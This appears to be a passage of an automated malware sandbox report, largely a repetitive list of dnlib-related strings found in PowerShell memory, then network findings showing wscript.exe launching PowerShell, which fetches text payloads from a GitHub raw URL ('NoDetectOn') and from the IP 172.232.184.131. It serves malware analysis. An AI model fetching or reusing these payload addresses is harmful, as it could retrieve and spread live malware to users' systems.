    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.pdb source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000004.00000002.1818349189.00000178393F0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dbpdbtem.pdb source: powershell.exe, 00000004.00000002.1817018540.0000017839048000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: System.pdbempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows source: powershell.exe, 00000004.00000002.1785773147.000001781F052000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1818349189.00000178393F0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1817018540.00000178390AF000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000004.00000002.1825456759.00007FFAAC7A0000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: System.pdb source: powershell.exe, 00000004.00000002.1818349189.00000178393F0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp

    Software Vulnerabilities

    barindex
    Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /801/SRVVR.txt HTTP/1.1Host: 172.232.184.131Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /801/SRVVR.txt HTTP/1.1Host: 172.232.184.131Connection: Keep-Alive
    Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
    Source: unknownTCP traffic detected without corresponding DNS query: 172.232.184.131
    Source: unknownTCP traffic detected without corresponding DNS query: 172.232.184.131
    Source: unknownTCP traffic detected without corresponding DNS query: 172.232.184.131
    Source: unknownTCP traffic detected without corresponding DNS query: 172.232.184.131
    Source: unknownTCP traffic detected without corresponding DNS query: 172.232.184.131
    Source: unknownTCP traffic detected without corresponding DNS query: 172.232.184.131
    Source: unknownTCP traffic detected without corresponding DNS query: 172.232.184.131
    Source: unknownTCP traffic detected without corresponding DNS query: 172.232.184.131
    Source: unknownTCP traffic detected without corresponding DNS query: 172.232.184.131
    Source: unknownTCP traffic detected without corresponding DNS query: 172.232.184.131
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /801/SRVVR.txt HTTP/1.1Host: 172.232.184.131Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /801/SRVVR.txt HTTP/1.1Host: 172.232.184.131Connection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
    Source: powershell.exe, 00000004.00000002.1786311869.000001782131B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.232.184.131
    Source: powershell.exe, 00000004.00000002.1786311869.000001782140B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.232.184.131(
    Source: powershell.exe, 00000004.00000002.1786311869.000001782131B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.232.184.131/801/SRVVR.txt
    Source: powershell.exe, 00000004.00000002.1800253709.0000017830F66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1786311869.0000017822986000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000004.00000002.1786311869.0000017821113000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1786311869.000001782261C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000004.00000002.1786311869.00000178225D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
    Source: powershell.exe, 00000002.00000002.1827379390.000002C68009D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1786311869.0000017820EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000004.00000002.1786311869.000001782261C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
    Source: powershell.exe, 00000004.00000002.1786311869.0000017821113000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1786311869.000001782261C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000002.00000002.1827379390.000002C680050000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
    Source: powershell.exe, 00000002.00000002.1827379390.000002C680070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1786311869.0000017820EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
    Source: powershell.exe, 00000004.00000002.1786311869.0000017822986000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000004.00000002.1786311869.0000017822986000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000004.00000002.1786311869.0000017822986000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000004.00000002.1786311869.0000017821113000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1786311869.000001782261C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000004.00000002.1786311869.00000178220F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
    Source: powershell.exe, 00000004.00000002.1800253709.0000017830F66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1786311869.0000017822986000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: powershell.exe, 00000004.00000002.1786311869.000001782261C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
    Source: powershell.exe, 00000004.00000002.1786311869.000001782261C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
    Source: powershell.exe, 00000004.00000002.1786311869.00000178225CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercont
    Source: powershell.exe, 00000004.00000002.1786311869.000001782254D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1786311869.0000017821113000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
    Source: powershell.exe, 00000004.00000002.1786311869.0000017821113000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
